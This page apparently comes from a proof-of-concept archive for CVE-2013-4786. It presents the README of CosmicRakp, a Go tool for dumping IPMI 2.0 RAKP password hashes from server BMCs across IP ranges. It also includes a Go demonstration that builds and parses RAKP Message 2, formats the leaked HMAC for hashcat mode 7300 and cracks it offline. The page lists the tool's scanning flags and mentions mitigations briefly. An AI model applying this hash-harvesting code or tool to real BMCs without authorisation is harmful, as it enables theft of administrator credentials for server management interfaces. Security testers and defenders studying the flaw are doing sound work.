
CVE-2013-4786 PoC: Intelligent Platform Management Interface trust management vulnerability

Source
Associated Vulnerability
Title: Intelligent Platform Management Interface trust management vulnerability (CVE-2013-4786)
Description: The Intelligent Platform Management Interface (IPMI) is an industry standard adopted by the peripheral devices of Intel-architecture enterprise systems. IPMI is also an open, royalty-free standard that users can adopt without paying additional fees. It spans different operating systems, firmware and hardware platforms, and can intelligently monitor, control and automatically report the operating status of large numbers of servers, reducing the cost of server systems. The RMCP supported by the Intelligent Platform Management Interface (IPMI) 2.0 specification
Description
CVE-2013-4786 Go exploitation tool
Readme
# CosmicRakp

![Thanos Image](./thanos.jpg)

## Table of Contents

- [Introduction](#introduction)
- [CVE-2013-4786](#cve-2013-4786)
- [Installation](#installation)
- [Usage](#usage)
- [Credits](#credits)
- [License](#license)

## Introduction

CosmicRakp is a tool written in Go that lets red teamers and penetration testers dump IPMI 2.0 RAKP password hashes from BMCs. The project aims to be efficient, fast, and easy to use.

## CVE-2013-4786

This tool exploits CVE-2013-4786, a design flaw in IPMI 2.0 session setup with RAKP (the RMCP+ Authenticated Key-Exchange Protocol). After the RMCP+ Open Session exchange, the console sends RAKP Message 1, which carries a username and a nonce. The BMC answers with RAKP Message 2, whose Key Exchange Authentication Code is an HMAC (HMAC-SHA1 for the usual RAKP-HMAC-SHA1 algorithm) over the two session IDs, both nonces, the BMC GUID, the requested role and the username, keyed with that user's password. The BMC sends this code before the console has proved anything, so anyone who can reach the BMC's UDP port 623 and guess a valid username receives a hash that can be cracked offline (hashcat mode 7300). Because the leak is part of the protocol itself, there is no firmware fix; the mitigations are keeping BMC interfaces off untrusted networks and using long, unique passwords.
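The exchange described above, as an added example that is not CosmicRakp's own code or the Metasploit module: both sides of RAKP Message 2 are run in one process, the BMC side computes the Key Exchange Authentication Code from a known password, the console side parses the payload, emits a hashcat mode 7300 line, and cracks it offline. The session IDs, nonces, GUID, role byte and usernames are constructed values chosen for the demo; the field order of the HMAC input and the payload layout follow the IPMI 2.0 RAKP Message 2 definition. No packets are sent.

```go
package main

import (
	"bytes"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// RAKP2 holds the inputs to the Key Exchange Authentication Code of IPMI 2.0 RAKP Message 2.
// The console knows SIDm, SIDc, Rm, RoleM and UName before RAKP 2 arrives; Rc, GUIDc and the code come from the BMC.
type RAKP2 struct {
	ConsoleSessionID uint32   // SIDm: chosen by the remote console
	BMCSessionID     uint32   // SIDc: assigned in the RMCP+ Open Session Response
	ConsoleRandom    [16]byte // Rm: sent by the console in RAKP Message 1
	BMCRandom        [16]byte // Rc: sent by the BMC in RAKP Message 2
	BMCGUID          [16]byte // GUIDc: sent by the BMC in RAKP Message 2
	Role             byte     // RoleM: requested privilege level byte from RAKP Message 1
	Username         string   // UName from RAKP Message 1
	AuthCode         []byte   // HMAC-SHA1 over the fields above, keyed with Kuid (the password)
}

// Salt is the byte string the BMC authenticates: SIDm | SIDc | Rm | Rc | GUIDc | RoleM | ULength | UName.
func (m *RAKP2) Salt() []byte {
	var b bytes.Buffer
	binary.Write(&b, binary.LittleEndian, m.ConsoleSessionID)
	binary.Write(&b, binary.LittleEndian, m.BMCSessionID)
	b.Write(m.ConsoleRandom[:])
	b.Write(m.BMCRandom[:])
	b.Write(m.BMCGUID[:])
	b.Write([]byte{m.Role, byte(len(m.Username))})
	b.WriteString(m.Username)
	return b.Bytes()
}

// AuthCode is the BMC-side computation HMAC-SHA1(Kuid, Salt). The BMC sends it before
// the console has proven anything, so a valid username alone yields a crackable hash.
func AuthCode(m *RAKP2, password string) []byte {
	mac := hmac.New(sha1.New, []byte(password))
	mac.Write(m.Salt())
	return mac.Sum(nil)
}

// BuildRAKP2 plays the BMC: tag | status | reserved(2) | SIDm | Rc | GUIDc | auth code.
func BuildRAKP2(tag byte, m *RAKP2, password string) []byte {
	var b bytes.Buffer
	b.Write([]byte{tag, 0x00, 0x00, 0x00}) // tag echoed from RAKP 1; status 0 = no error; reserved
	binary.Write(&b, binary.LittleEndian, m.ConsoleSessionID)
	b.Write(m.BMCRandom[:])
	b.Write(m.BMCGUID[:])
	b.Write(AuthCode(m, password))
	return b.Bytes()
}

// ParseRAKP2 plays the console: check status and session ID, keep Rc, GUIDc and the auth code. RAKP 3 is never sent.
func ParseRAKP2(payload []byte, m *RAKP2) error {
	if len(payload) < 40+sha1.Size {
		return fmt.Errorf("rakp2: %d bytes, too short for an HMAC-SHA1 auth code", len(payload))
	}
	if payload[1] != 0x00 {
		return fmt.Errorf("rakp2: RMCP+ status 0x%02x (often an unknown username)", payload[1])
	}
	if got := binary.LittleEndian.Uint32(payload[4:8]); got != m.ConsoleSessionID {
		return fmt.Errorf("rakp2: console session ID mismatch %#x", got)
	}
	copy(m.BMCRandom[:], payload[8:24])
	copy(m.BMCGUID[:], payload[24:40])
	m.AuthCode = append([]byte(nil), payload[40:40+sha1.Size]...)
	return nil
}

// Hashcat7300 formats the leak for hashcat mode 7300 (IPMI2 RAKP HMAC-SHA1): salt:hmac.
func Hashcat7300(m *RAKP2) string { return hex.EncodeToString(m.Salt()) + ":" + hex.EncodeToString(m.AuthCode) }

// CrackOffline recomputes the auth code for each candidate; a match is the account's password.
func CrackOffline(m *RAKP2, candidates []string) (string, bool) {
	for _, c := range candidates {
		if hmac.Equal(AuthCode(m, c), m.AuthCode) {
			return c, true
		}
	}
	return "", false
}

// SimulateExchange runs both sides in-process with constructed, fixed nonces (not random) against a BMC that knows password.
func SimulateExchange(username, password string) (*RAKP2, error) {
	console := &RAKP2{ConsoleSessionID: 0xa0a2a3a4, BMCSessionID: 0x01, Role: 0x14, Username: username}
	copy(console.ConsoleRandom[:], bytes.Repeat([]byte{0x11}, 16)) // Rm (constructed)
	bmc := *console                                                 // the BMC's view of the same session
	copy(bmc.BMCRandom[:], bytes.Repeat([]byte{0x22}, 16))         // Rc (constructed)
	copy(bmc.BMCGUID[:], bytes.Repeat([]byte{0x33}, 16))           // GUIDc (constructed)
	if err := ParseRAKP2(BuildRAKP2(0x01, &bmc, password), console); err != nil {
		return nil, err
	}
	return console, nil
}
```

Calling `SimulateExchange("ADMIN", "ADMIN")` and printing `Hashcat7300(m)` gives a line that `hashcat -m 7300` accepts; `CrackOffline` does the same computation in-process for a small candidate list. Note that a nonzero RMCP+ status in RAKP Message 2 is the BMC's usual answer for an unknown user, which is why a username list (the tool's `-usernames` file) matters more than any password guessing at this stage.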

## Installation

```bash
./build.sh
```

## Usage

```text
❯ ./cosmicrakp -h
Usage of ./cosmicrakp:
  -debug
    	enable debug mode
  -max-attempts int
    	maximum number of attempts to open a session (default 3)
  -mode string
    	mode of operation: 'range' or 'file' (default "range")
  -output string
    	File to store output results (default "output.txt")
  -range string
    	IP range for 'range' mode
  -retry-delay duration
    	time to wait between retries (in seconds) (default 2s)
  -targets string
    	target file for 'file' mode
  -threads int
    	number of threads for concurrent execution (default 4)
  -usernames string
    	File containing usernames to test (default "users.txt")
```


## Credits

This project is inspired by and pays homage to one of the original (if not the original) proofs of concept for exploiting CVE-2013-4786: the Metasploit Framework module ipmi_dumphashes, based on Dan Farmer's IPMI research. You can find the original code [here](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb).

## License

This project uses the MIT license.
File Snapshot

```text
[4.0K] /data/pocs/ebd2ef133a56ba8f68fe74537d0a1d70362326af
├── [  65] build.sh
├── [4.0K] ipmi
│   └── [ 11K] ipmi.go
├── [1.0K] LICENSE
├── [7.6K] main.go
├── [1.9K] README.md
├── [194K] thanos.jpg
├── [  50] users.txt
└── [4.0K] util
    └── [2.2K] util.go

2 directories, 8 files
```